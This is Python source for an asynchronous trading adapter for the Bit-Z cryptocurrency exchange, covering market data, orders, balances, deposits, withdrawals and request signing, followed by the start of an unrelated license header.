def describe(self):
return self.deep_extend(super(bitz, self).describe(), {
'id': 'bitz',
'name': 'Bit-Z',
'countries': ['HK'],
'rateLimit': 2000,
'version': 'v2',
'userAgent': self.userAgents['chrome'],
'has': {
'cancelOrder': True,
'cancelOrders': True,
'createOrder': True,
'createMarketOrder': False,
'fetchBalance': True,
'fetchDeposits': True,
'fetchClosedOrders': True,
'fetchMarkets': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchTransactions': False,
'fetchWithdrawals': True,
'withdraw': True,
},
'timeframes': {
'1m': '1min',
'5m': '5min',
'15m': '15min',
'30m': '30min',
'1h': '60min',
'4h': '4hour',
'1d': '1day',
'5d': '5day',
'1w': '1week',
'1M': '1mon',
},
'hostname': 'apiv2.bitz.com',
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87443304-fec5e000-c5fd-11ea-98f8-ba8e67f7eaff.jpg',
'api': {
'market': 'https://{hostname}',
'trade': 'https://{hostname}',
'assets': 'https://{hostname}',
},
'www': 'https://www.bitz.com',
'doc': 'https://apidocv2.bitz.plus/en/',
'fees': 'https://www.bitz.com/fee?type=1',
'referral': 'https://u.bitz.com/register?invite_code=1429193',
},
'api': {
'market': {
'get': [
'ticker',
'depth',
'order', # trades
'tickerall',
'kline',
'symbolList',
'getServerTime',
'currencyRate',
'currencyCoinRate',
'coinRate',
'getContractCoin',
'getContractKline',
'getContractOrderBook',
'getContractTradesHistory',
'getContractTickers',
],
},
'trade': {
'post': [
'addEntrustSheet',
'cancelEntrustSheet',
'cancelAllEntrustSheet',
'coinOut', # withdraw
'getUserHistoryEntrustSheet', # closed orders
'getUserNowEntrustSheet', # open orders
'getEntrustSheetInfo', # order
'depositOrWithdraw', # transactions
'getCoinAddress',
'getCoinAddressList',
'marketTrade',
'addEntrustSheetBatch',
],
},
'assets': {
'post': [
'getUserAssets',
],
},
'contract': {
'post': [
'addContractTrade',
'cancelContractTrade',
'getContractActivePositions',
'getContractAccountInfo',
'getContractMyPositions',
'getContractOrderResult',
'getContractTradeResult',
'getContractOrder',
'getContractMyHistoryTrade',
'getContractMyTrades',
],
},
},
'fees': {
'trading': {
'maker': 0.002,
'taker': 0.002,
},
'funding': {
'withdraw': {
'BTC': '0.5%',
'DKKT': '0.5%',
'ETH': 0.01,
'USDT': '0.5%',
'LTC': '0.5%',
'FCT': '0.5%',
'LSK': '0.5%',
'HXI': '0.8%',
'ZEC': '0.5%',
'DOGE': '0.5%',
'MZC': '0.5%',
'ETC': '0.5%',
'GXS': '0.5%',
'XPM': '0.5%',
'PPC': '0.5%',
'BLK': '0.5%',
'XAS': '0.5%',
'HSR': '0.5%',
'NULS': 5.0,
'VOISE': 350.0,
'PAY': 1.5,
'EOS': 0.6,
'YBCT': 35.0,
'OMG': 0.3,
'OTN': 0.4,
'BTX': '0.5%',
'QTUM': '0.5%',
'DASH': '0.5%',
'GAME': '0.5%',
'BCH': '0.5%',
'GNT': 9.0,
'SSS': 1500.0,
'ARK': '0.5%',
'PART': '0.5%',
'LEO': '0.5%',
'DGB': '0.5%',
'ZSC': 130.0,
'VIU': 350.0,
'BTG': '0.5%',
'ARN': 10.0,
'VTC': '0.5%',
'BCD': '0.5%',
'TRX': 200.0,
'HWC': '0.5%',
'UNIT': '0.5%',
'OXY': '0.5%',
'MCO': 0.3500,
'SBTC': '0.5%',
'BCX': '0.5%',
'ETF': '0.5%',
'PYLNT': 0.4000,
'XRB': '0.5%',
'ETP': '0.5%',
},
},
},
'precision': {
'amount': 8,
'price': 8,
},
'options': {
'fetchOHLCVVolume': True,
'fetchOHLCVWarning': True,
'lastNonceTimestamp': 0,
},
'commonCurrencies': {
# https://github.com/ccxt/ccxt/issues/3881
# https://support.bit-z.pro/hc/en-us/articles/360007500654-BOX-BOX-Token-
'BOX': 'BOX Token',
'LEO': 'LeoCoin',
'XRB': 'NANO',
'PXC': 'Pixiecoin',
'VTC': 'VoteCoin',
'TTC': 'TimesChain',
},
'exceptions': {
# '200': Success
'-102': ExchangeError, # Invalid parameter
'-103': AuthenticationError, # Verification failed
'-104': ExchangeNotAvailable, # Network Error-1
'-105': AuthenticationError, # Invalid api signature
'-106': ExchangeNotAvailable, # Network Error-2
'-109': AuthenticationError, # Invalid scretKey
'-110': DDoSProtection, # The number of access requests exceeded
'-111': PermissionDenied, # Current IP is not in the range of trusted IP
'-112': OnMaintenance, # Service is under maintenance
'-114': RateLimitExceeded, # The number of daily requests has reached the limit
'-117': AuthenticationError, # The apikey expires
'-100015': AuthenticationError, # Trade password error
'-100044': ExchangeError, # Fail to request data
'-100101': ExchangeError, # Invalid symbol
'-100201': ExchangeError, # Invalid symbol
'-100301': ExchangeError, # Invalid symbol
'-100401': ExchangeError, # Invalid symbol
'-100302': ExchangeError, # Type of K-line error
'-100303': ExchangeError, # Size of K-line error
'-200003': AuthenticationError, # Please set trade password
'-200005': PermissionDenied, # This account can not trade
'-200025': ExchangeNotAvailable, # Temporary trading halt
'-200027': InvalidOrder, # Price Error
'-200028': InvalidOrder, # Amount must be greater than 0
'-200029': InvalidOrder, # Number must be between %s and %d
'-200030': InvalidOrder, # Over price range
'-200031': InsufficientFunds, # Insufficient assets
'-200032': ExchangeError, # System error. Please contact customer service
'-200033': ExchangeError, # Fail to trade
'-200034': OrderNotFound, # The order does not exist
'-200035': OrderNotFound, # Cancellation error, order filled
'-200037': InvalidOrder, # Trade direction error
'-200038': ExchangeError, # Trading Market Error
'-200055': OrderNotFound, # Order record does not exist
'-300069': AuthenticationError, # api_key is illegal
'-300101': ExchangeError, # Transaction type error
'-300102': InvalidOrder, # Price or number cannot be less than 0
'-300103': AuthenticationError, # Trade password error
'-301001': ExchangeNotAvailable, # Network Error-3
},
})
async def fetch_markets(self, params={}):
response = await self.marketGetSymbolList(params)
#
# { status: 200,
# msg: "",
# data: { ltc_btc: { id: "1",
# name: "ltc_btc",
# coinFrom: "ltc",
# coinTo: "btc",
# numberFloat: "4",
# priceFloat: "8",
# status: "1",
# minTrade: "0.010",
# maxTrade: "500000000.000"},
# qtum_usdt: { id: "196",
# name: "qtum_usdt",
# coinFrom: "qtum",
# coinTo: "usdt",
# numberFloat: "4",
# priceFloat: "2",
# status: "1",
# minTrade: "0.100",
# maxTrade: "500000000.000"}, },
# time: 1535969146,
# microtime: "0.66955600 1535969146",
# source: "api" }
#
markets = self.safe_value(response, 'data')
ids = list(markets.keys())
result = []
for i in range(0, len(ids)):
id = ids[i]
market = markets[id]
numericId = self.safe_string(market, 'id')
baseId = self.safe_string(market, 'coinFrom')
quoteId = self.safe_string(market, 'coinTo')
base = baseId.upper()
quote = quoteId.upper()
base = self.safe_currency_code(base)
quote = self.safe_currency_code(quote)
symbol = base + '/' + quote
precision = {
'amount': self.safe_integer(market, 'numberFloat'),
'price': self.safe_integer(market, 'priceFloat'),
}
result.append({
'info': market,
'id': id,
'numericId': numericId,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': True,
'precision': precision,
'limits': {
'amount': {
'min': self.safe_number(market, 'minTrade'),
'max': self.safe_number(market, 'maxTrade'),
},
'price': {
'min': math.pow(10, -precision['price']),
'max': None,
},
'cost': {
'min': None,
'max': None,
},
},
})
return result
async def fetch_balance(self, params={}):
await self.load_markets()
response = await self.assetsPostGetUserAssets(params)
#
# {
# status: 200,
# msg: "",
# data: {
# cny: 0,
# usd: 0,
# btc_total: 0,
# info: [{
# "name": "zpr",
# "num": "37.49067275",
# "over": "37.49067275",
# "lock": "0.00000000",
# "btc": "0.00000000",
# "usd": "0.00000000",
# "cny": "0.00000000",
# }],
# },
# time: 1535983966,
# microtime: "0.70400500 1535983966",
# source: "api",
# }
#
balances = self.safe_value(response['data'], 'info')
result = {'info': response}
for i in range(0, len(balances)):
balance = balances[i]
currencyId = self.safe_string(balance, 'name')
code = self.safe_currency_code(currencyId)
account = self.account()
account['used'] = self.safe_string(balance, 'lock')
account['total'] = self.safe_string(balance, 'num')
account['free'] = self.safe_string(balance, 'over')
result[code] = account
return self.parse_balance(result, False)
def parse_ticker(self, ticker, market=None):
#
# { symbol: "eth_btc",
# quoteVolume: "3905.72",
# volume: "97058.21",
# priceChange: "-1.72",
# priceChange24h: "-1.65",
# askPrice: "0.03971272",
# askQty: "0.0663",
# bidPrice: "0.03961469",
# bidQty: "19.5451",
# open: "0.04036769",
# high: "0.04062988",
# low: "0.03956123",
# now: "0.03970100",
# firstId: 115567767,
# lastId: 115795316,
# dealCount: 14078,
# numberPrecision: 4,
# pricePrecision: 8,
# cny: "1959.05",
# usd: "287.10",
# krw: "318655.82" }
#
timestamp = None
marketId = self.safe_string(ticker, 'symbol')
symbol = self.safe_symbol(marketId, market, '_')
last = self.safe_number(ticker, 'now')
open = self.safe_number(ticker, 'open')
change = None
average = None
if last is not None and open is not None:
change = last - open
average = self.sum(last, open) / 2
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high'),
'low': self.safe_number(ticker, 'low'),
'bid': self.safe_number(ticker, 'bidPrice'),
'bidVolume': self.safe_number(ticker, 'bidQty'),
'ask': self.safe_number(ticker, 'askPrice'),
'askVolume': self.safe_number(ticker, 'askQty'),
'vwap': None,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': self.safe_number(ticker, 'priceChange24h'),
'average': average,
'baseVolume': self.safe_number(ticker, 'volume'),
'quoteVolume': self.safe_number(ticker, 'quoteVolume'),
'info': ticker,
}
def parse_microtime(self, microtime):
if microtime is None:
return microtime
parts = microtime.split(' ')
milliseconds = float(parts[0])
seconds = int(parts[1])
total = self.sum(seconds, milliseconds)
return int(total * 1000)
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = await self.marketGetTicker(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: { symbol: "eth_btc",
# quoteVolume: "3905.72",
# volume: "97058.21",
# priceChange: "-1.72",
# priceChange24h: "-1.65",
# askPrice: "0.03971272",
# askQty: "0.0663",
# bidPrice: "0.03961469",
# bidQty: "19.5451",
# open: "0.04036769",
# high: "0.04062988",
# low: "0.03956123",
# now: "0.03970100",
# firstId: 115567767,
# lastId: 115795316,
# dealCount: 14078,
# numberPrecision: 4,
# pricePrecision: 8,
# cny: "1959.05",
# usd: "287.10",
# krw: "318655.82" },
# time: 1535970397,
# microtime: "0.76341900 1535970397",
# source: "api" }
#
ticker = self.parse_ticker(response['data'], market)
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
return self.extend(ticker, {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
async def fetch_tickers(self, symbols=None, params={}):
await self.load_markets()
request = {}
if symbols is not None:
ids = self.market_ids(symbols)
request['symbols'] = ','.join(ids)
response = await self.marketGetTickerall(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: { ela_btc: { symbol: "ela_btc",
# quoteVolume: "0.00",
# volume: "3.28",
# priceChange: "0.00",
# priceChange24h: "0.00",
# askPrice: "0.00147984",
# askQty: "5.4580",
# bidPrice: "0.00120230",
# bidQty: "12.5384",
# open: "0.00149078",
# high: "0.00149078",
# low: "0.00149078",
# now: "0.00149078",
# firstId: 115581219,
# lastId: 115581219,
# dealCount: 1,
# numberPrecision: 4,
# pricePrecision: 8,
# cny: "73.66",
# usd: "10.79",
# krw: "11995.03" } },
# time: 1535971578,
# microtime: "0.39854200 1535971578",
# source: "api" }
#
tickers = self.safe_value(response, 'data')
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
result = {}
ids = list(tickers.keys())
for i in range(0, len(ids)):
id = ids[i]
ticker = tickers[id]
market = None
if id in self.markets_by_id:
market = self.markets_by_id[id]
ticker = self.parse_ticker(tickers[id], market)
symbol = ticker['symbol']
if symbol is None:
if market is not None:
symbol = market['symbol']
else:
baseId, quoteId = id.split('_')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
if symbol is not None:
result[symbol] = self.extend(ticker, {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
return self.filter_by_array(result, 'symbol', symbols)
async def fetch_time(self, params={}):
response = await self.marketGetGetServerTime(params)
#
# {
# "status":200,
# "msg":"",
# "data":[],
# "time":1555490875,
# "microtime":"0.35994200 1555490875",
# "source":"api"
# }
#
return self.safe_timestamp(response, 'time')
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
request = {
'symbol': self.market_id(symbol),
}
response = await self.marketGetDepth(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: { asks: [["10.00000000", "0.4426", "4.4260"],
# ["1.00000000", "0.8339", "0.8339"],
# ["0.91700000", "0.0500", "0.0458"],
# ["0.20000000", "0.1000", "0.0200"],
# ["0.03987120", "16.1262", "0.6429"],
# ["0.03986120", "9.7523", "0.3887"] ],
# bids: [["0.03976145", "0.0359", "0.0014"],
# ["0.03973401", "20.9493", "0.8323"],
# ["0.03967970", "0.0328", "0.0013"],
# ["0.00000002", "10000.0000", "0.0002"],
# ["0.00000001", "231840.7500", "0.0023"]],
# coinPair: "eth_btc" },
# time: 1535974778,
# microtime: "0.04017400 1535974778",
# source: "api" }
#
orderbook = self.safe_value(response, 'data')
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
return self.parse_order_book(orderbook, timestamp)
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {id: 115807453,
# t: "19:36:24",
# T: 1535974584,
# p: "0.03983296",
# n: "0.1000",
# s: "buy" },
#
id = self.safe_string(trade, 'id')
timestamp = self.safe_timestamp(trade, 'T')
symbol = None
if market is not None:
symbol = market['symbol']
price = self.safe_number(trade, 'p')
amount = self.safe_number(trade, 'n')
cost = None
if price is not None:
if amount is not None:
cost = self.price_to_precision(symbol, amount * price)
side = self.safe_string(trade, 's')
return {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'id': id,
'order': None,
'type': 'limit',
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
'info': trade,
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = await self.marketGetOrder(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: [{id: 115807453,
# t: "19:36:24",
# T: 1535974584,
# p: "0.03983296",
# n: "0.1000",
# s: "buy" },
# {id: 115806811,
# t: "19:33:19",
# T: 1535974399,
# p: "0.03981135",
# n: "9.4612",
# s: "sell" } ],
# time: 1535974583,
# microtime: "0.57118100 1535974583",
# source: "api" }
#
return self.parse_trades(response['data'], market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# time: "1535973420000",
# open: "0.03975084",
# high: "0.03975084",
# low: "0.03967700",
# close: "0.03967700",
# volume: "12.4733",
# datetime: "2018-09-03 19:17:00"
# }
#
return [
self.safe_integer(ohlcv, 'time'),
self.safe_number(ohlcv, 'open'),
self.safe_number(ohlcv, 'high'),
self.safe_number(ohlcv, 'low'),
self.safe_number(ohlcv, 'close'),
self.safe_number(ohlcv, 'volume'),
]
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
await self.load_markets()
duration = self.parse_timeframe(timeframe) * 1000
market = self.market(symbol)
request = {
'symbol': market['id'],
'resolution': self.timeframes[timeframe],
}
if limit is not None:
request['size'] = min(limit, 300) # 1-300
if since is not None:
request['to'] = self.sum(since, limit * duration * 1000)
else:
if since is not None:
raise ArgumentsRequired(self.id + ' fetchOHLCV() requires a limit argument if the since argument is specified')
response = await self.marketGetKline(self.extend(request, params))
#
# {
# status: 200,
# msg: "",
# data: {
# bars: [
# {time: "1535973420000", open: "0.03975084", high: "0.03975084", low: "0.03967700", close: "0.03967700", volume: "12.4733", datetime: "2018-09-03 19:17:00"},
# {time: "1535955480000", open: "0.04009900", high: "0.04016745", low: "0.04009900", close: "0.04012074", volume: "74.4803", datetime: "2018-09-03 14:18:00"},
# ],
# resolution: "1min",
# symbol: "eth_btc",
# from: "1535973420000",
# to: "1535955480000",
# size: 300
# },
# time: 1535973435,
# microtime: "0.56462100 1535973435",
# source: "api"
# }
#
data = self.safe_value(response, 'data', {})
bars = self.safe_value(data, 'bars', [])
return self.parse_ohlcvs(bars, market, timeframe, since, limit)
def parse_order_status(self, status):
statuses = {
'0': 'open',
'1': 'open', # partially filled
'2': 'closed', # filled
'3': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# createOrder
#
# {
# "id": "693248739", # order id
# "uId": "2074056", # uid
# "price": "100", # price
# "number": "10", # number
# "numberOver": "10", # undealed
# "flag": "sale", # flag
# "status": "0", # unfilled
# "coinFrom": "vtc",
# "coinTo": "dkkt",
# "numberDeal": "0" # dealed
# }
#
id = self.safe_string(order, 'id')
symbol = None
if market is None:
baseId = self.safe_string(order, 'coinFrom')
quoteId = self.safe_string(order, 'coinTo')
if (baseId is not None) and (quoteId is not None):
marketId = baseId + '_' + quoteId
if marketId in self.markets_by_id:
market = self.safe_value(self.markets_by_id, marketId)
else:
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
if market is not None:
symbol = market['symbol']
side = self.safe_string(order, 'flag')
if side is not None:
side = 'sell' if (side == 'sale') else 'buy'
price = self.safe_number(order, 'price')
amount = self.safe_number(order, 'number')
remaining = self.safe_number(order, 'numberOver')
filled = self.safe_number(order, 'numberDeal')
timestamp = self.safe_integer(order, 'timestamp')
if timestamp is None:
timestamp = self.safe_timestamp(order, 'created')
cost = self.safe_number(order, 'orderTotalPrice')
status = self.parse_order_status(self.safe_string(order, 'status'))
return self.safe_order({
'id': id,
'clientOrderId': None,
'datetime': self.iso8601(timestamp),
'timestamp': timestamp,
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': 'limit',
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': None,
'cost': cost,
'amount': amount,
'filled': filled,
'remaining': remaining,
'trades': None,
'fee': None,
'info': order,
'average': None,
})
async def create_order(self, symbol, type, side, amount, price=None, params={}):
await self.load_markets()
if type != 'limit':
raise ExchangeError(self.id + ' createOrder allows limit orders only')
market = self.market(symbol)
orderType = '1' if (side == 'buy') else '2'
if not self.password:
raise ExchangeError(self.id + ' createOrder() requires you to set exchange.password = "YOUR_TRADING_PASSWORD"(a trade password is NOT THE SAME as your login password)')
request = {
'symbol': market['id'],
'type': orderType,
'price': self.price_to_precision(symbol, price),
'number': self.amount_to_precision(symbol, amount),
'tradePwd': self.password,
}
response = await self.tradePostAddEntrustSheet(self.extend(request, params))
#
# {
# "status": 200,
# "msg": "",
# "data": {
# "id": "693248739", # order id
# "uId": "2074056", # uid
# "price": "100", # price
# "number": "10", # number
# "numberOver": "10", # undealed
# "flag": "sale", # flag
# "status": "0", # unfilled
# "coinFrom": "vtc",
# "coinTo": "dkkt",
# "numberDeal": "0" # dealed
# },
# "time": "1533035297",
# "microtime": "0.41892000 1533035297",
# "source": "api",
# }
#
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
order = self.extend({
'timestamp': timestamp,
}, response['data'])
return self.parse_order(order, market)
async def cancel_order(self, id, symbol=None, params={}):
await self.load_markets()
request = {
'entrustSheetId': id,
}
response = await self.tradePostCancelEntrustSheet(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "updateAssetsData":{
# "coin":"bz",
# "over":"1000.00000000",
# "lock":"-1000.00000000"
# },
# "assetsInfo":{
# "coin":"bz",
# "over":"9999.99999999",
# "lock":"9999.99999999"
# }
# },
# "time":"1535464383",
# "microtime":"0.91558000 1535464383",
# "source":"api"
# }
#
return response
async def cancel_orders(self, ids, symbol=None, params={}):
await self.load_markets()
request = {
'ids': ','.join(ids),
}
response = await self.tradePostCancelEntrustSheet(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "744173808":{
# "updateAssetsData":{
# "coin":"bz",
# "over":"100.00000000",
# "lock":"-100.00000000"
# },
# "assetsInfo":{
# "coin":"bz",
# "over":"899.99999999",
# "lock":"19099.99999999"
# }
# },
# "744173809":{
# "updateAssetsData":{
# "coin":"bz",
# "over":"100.00000000",
# "lock":"-100.00000000"
# },
# "assetsInfo":{
# "coin":"bz",
# "over":"999.99999999",
# "lock":"18999.99999999"
# }
# }
# },
# "time":"1535525649",
# "microtime":"0.05009400 1535525649",
# "source":"api"
# }
#
return response
async def fetch_order(self, id, symbol=None, params={}):
await self.load_markets()
request = {
'entrustSheetId': id,
}
response = await self.tradePostGetEntrustSheetInfo(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "id":"708279852",
# "uId":"2074056",
# "price":"100.00000000",
# "number":"10.0000",
# "total":"0.00000000",
# "numberOver":"10.0000",
# "numberDeal":"0.0000",
# "flag":"sale",
# "status":"0", #0:unfilled, 1:partial deal, 2:all transactions, 3:already cancelled
# "coinFrom":"bz",
# "coinTo":"usdt",
# "orderTotalPrice":"0",
# "created":"1533279876"
# },
# "time":"1533280294",
# "microtime":"0.36859200 1533280294",
# "source":"api"
# }
#
return self.parse_order(response['data'])
async def fetch_orders_with_method(self, method, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOpenOrders() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
request = {
'coinFrom': market['baseId'],
'coinTo': market['quoteId'],
# 'type': 1, # optional integer, 1 = buy, 2 = sell
# 'page': 1, # optional integer
# 'pageSize': 100, # optional integer, max 100
# 'startTime': 1510235730, # optional integer timestamp in seconds
# 'endTime': 1510235730, # optional integer timestamp in seconds
}
if limit is not None:
request['page'] = 1
request['pageSize'] = limit
if since is not None:
request['startTime'] = int(since / 1000)
# request['endTime'] = int(since / 1000)
response = await getattr(self, method)(self.extend(request, params))
#
# {
# "status": 200,
# "msg": "",
# "data": {
# "data": [
# {
# "id": "693248739",
# "uid": "2074056",
# "price": "100.00000000",
# "number": "10.0000",
# "total": "0.00000000",
# "numberOver": "0.0000",
# "numberDeal": "0.0000",
# "flag": "sale",
# "status": "3", # 0:unfilled, 1:partial deal, 2:all transactions, 3:already cancelled
# "isNew": "N",
# "coinFrom": "vtc",
# "coinTo": "dkkt",
# "created": "1533035300",
# },
# {
# "id": "723086996",
# "uid": "2074056",
# "price": "100.00000000",
# "number": "10.0000",
# "total": "0.00000000",
# "numberOver": "0.0000",
# "numberDeal": "0.0000",
# "flag": "sale",
# "status": "3",
# "isNew": "N",
# "coinFrom": "bz",
# "coinTo": "usdt",
# "created": "1533523568",
# },
# ],
# "pageInfo": {
# "limit": "10",
# "offest": "0",
# "current_page": "1",
# "page_size": "10",
# "total_count": "17",
# "page_count": "2",
# }
# },
# "time": "1533279329",
# "microtime": "0.15305300 1533279329",
# "source": "api"
# }
#
orders = self.safe_value(response['data'], 'data', [])
return self.parse_orders(orders, None, since, limit)
async def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_with_method('tradePostGetUserHistoryEntrustSheet', symbol, since, limit, params)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_with_method('tradePostGetUserNowEntrustSheet', symbol, since, limit, params)
async def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_with_method('tradePostGetUserHistoryEntrustSheet', symbol, since, limit, params)
def parse_transaction_status(self, status):
statuses = {
'1': 'pending',
'2': 'pending',
'3': 'pending',
'4': 'ok',
'5': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
#
# {
# "id": '96275',
# "uid": '2109073',
# "wallet": '0xf4c4141c0127bc37b1d0c409a091920eba13ada7',
# "txid": '0xb7adfa52aa566f9ac112e3c01f77bd91179b19eab12092a9a5a8b33d5086e31d',
# "confirm": '12',
# "number": '0.50000000',
# "status": 4,
# "updated": '1534944168605',
# "addressUrl": 'https://etherscan.io/address/',
# "txidUrl": 'https://etherscan.io/tx/',
# "description": 'Ethereum',
# "coin": 'eth',
# "memo": ''
# }
#
# {
# "id":"397574",
# "uid":"2033056",
# "wallet":"1AG1gZvQAYu3WBvgg7p4BMMghQD2gE693k",
# "txid":"",
# "confirm":"0",
# "number":"1000.00000000",
# "status":1,
# "updated":"0",
# "addressUrl":"http://omniexplorer.info/lookupadd.aspx?address=",
# "txidUrl":"http://omniexplorer.info/lookuptx.aspx?txid=",
# "description":"Tether",
# "coin":"usdt",
# "memo":""
# }
#
# {
# "id":"153606",
# "uid":"2033056",
# "wallet":"1AG1gZvQAYu3WBvgg7p4BMMghQD2gE693k",
# "txid":"aa2b179f84cd6dedafd41845e0fbf7f01e14c0d71ea3140d03d6f5a9ccd93199",
# "confirm":"0",
# "number":"761.11110000",
# "status":4,
# "updated":"1536726133579",
# "addressUrl":"http://omniexplorer.info/lookupadd.aspx?address=",
# "txidUrl":"http://omniexplorer.info/lookuptx.aspx?txid=",
# "description":"Tether",
# "coin":"usdt",
# "memo":""
# }
#
# withdraw
#
# {
# "id":397574,
# "email":"***@email.com",
# "coin":"usdt",
# "network_fee":"",
# "eid":23112
# }
#
timestamp = self.safe_integer(transaction, 'updated')
if timestamp == 0:
timestamp = None
currencyId = self.safe_string(transaction, 'coin')
code = self.safe_currency_code(currencyId, currency)
type = self.safe_string_lower(transaction, 'type')
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
fee = None
feeCost = self.safe_number(transaction, 'network_fee')
if feeCost is not None:
fee = {
'cost': feeCost,
'code': code,
}
return {
'id': self.safe_string(transaction, 'id'),
'txid': self.safe_string(transaction, 'txid'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'address': self.safe_string(transaction, 'wallet'),
'tag': self.safe_string(transaction, 'memo'),
'type': type,
'amount': self.safe_number(transaction, 'number'),
'currency': code,
'status': status,
'updated': timestamp,
'fee': fee,
'info': transaction,
}
def parse_transactions_by_type(self, type, transactions, code=None, since=None, limit=None):
result = []
for i in range(0, len(transactions)):
transaction = self.parse_transaction(self.extend({
'type': type,
}, transactions[i]))
result.append(transaction)
return self.filter_by_currency_since_limit(result, code, since, limit)
def parse_transaction_type(self, type):
types = {
'deposit': 1,
'withdrawal': 2,
}
return self.safe_integer(types, type, type)
async def fetch_deposits(self, code=None, since=None, limit=None, params={}):
return await self.fetch_transactions_for_type('deposit', code, since, limit, params)
async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
return await self.fetch_transactions_for_type('withdrawal', code, since, limit, params)
async def fetch_transactions_for_type(self, type, code=None, since=None, limit=None, params={}):
if code is None:
raise ArgumentsRequired(self.id + ' fetchTransactions() requires a currency `code` argument')
await self.load_markets()
currency = self.currency(code)
request = {
'coin': currency['id'],
'type': self.parse_transaction_type(type),
}
if since is not None:
request['startTime'] = int(since / str(1000))
if limit is not None:
request['page'] = 1
request['pageSize'] = limit
response = await self.tradePostDepositOrWithdraw(self.extend(request, params))
transactions = self.safe_value(response['data'], 'data', [])
return self.parse_transactions_by_type(type, transactions, code, since, limit)
async def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
await self.load_markets()
currency = self.currency(code)
request = {
'coin': currency['id'],
'number': self.currency_to_precision(code, amount),
'address': address,
# 'type': 'erc20', # omni, trc20, optional
}
if tag is not None:
request['memo'] = tag
response = await self.tradePostCoinOut(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "id":397574,
# "email":"***@email.com",
# "coin":"usdt",
# "network_fee":"",
# "eid":23112
# },
# "time":1552641646,
# "microtime":"0.70304500 1552641646",
# "source":"api"
# }
#
data = self.safe_value(response, 'data', {})
return self.parse_transaction(data, currency)
def nonce(self):
currentTimestamp = self.seconds()
if currentTimestamp > self.options['lastNonceTimestamp']:
self.options['lastNonceTimestamp'] = currentTimestamp
self.options['lastNonce'] = 100000
self.options['lastNonce'] = self.sum(self.options['lastNonce'], 1)
return self.options['lastNonce']
def sign(self, path, api='market', method='GET', params={}, headers=None, body=None):
baseUrl = self.implode_params(self.urls['api'][api], {'hostname': self.hostname})
url = baseUrl + '/' + self.capitalize(api) + '/' + path
query = None
if api == 'market':
query = self.urlencode(params)
if len(query):
url += '?' + query
else:
self.check_required_credentials()
body = self.rawencode(self.keysort(self.extend({
'apiKey': self.apiKey,
'timeStamp': self.seconds(),
'nonce': self.nonce(),
}, params)))
body += '&sign=' + self.hash(self.encode(body + self.secret))
headers = {'Content-type': 'application/x-www-form-urlencoded'}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return # fallback to default error handler
status = self.safe_string(response, 'status')
if status is not None:
feedback = self.id + ' ' + body
#
# {"status":-107,"msg":"","data":"","time":1535968848,"microtime":"0.89092200 1535968848","source":"api"}
#
if status == '200':
#
# {"status":200,"msg":"","data":-200031,"time":1535999806,"microtime":"0.85476800 1535999806","source":"api"}
#
code = self.safe_integer(response, 'data')
if code is not None:
self.throw_exactly_matched_exception(self.exceptions, code, feedback)
raise ExchangeError(feedback)
else:
return # no error
self.throw_exactly_matched_exception(self.exceptions, status, feedback)
raise ExchangeError(feedback)
|
py | 1a4bbfb63aa1fca746b0d0b0999c9c2a4e3e5d7a | # Copyright 2018 The Cornac Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
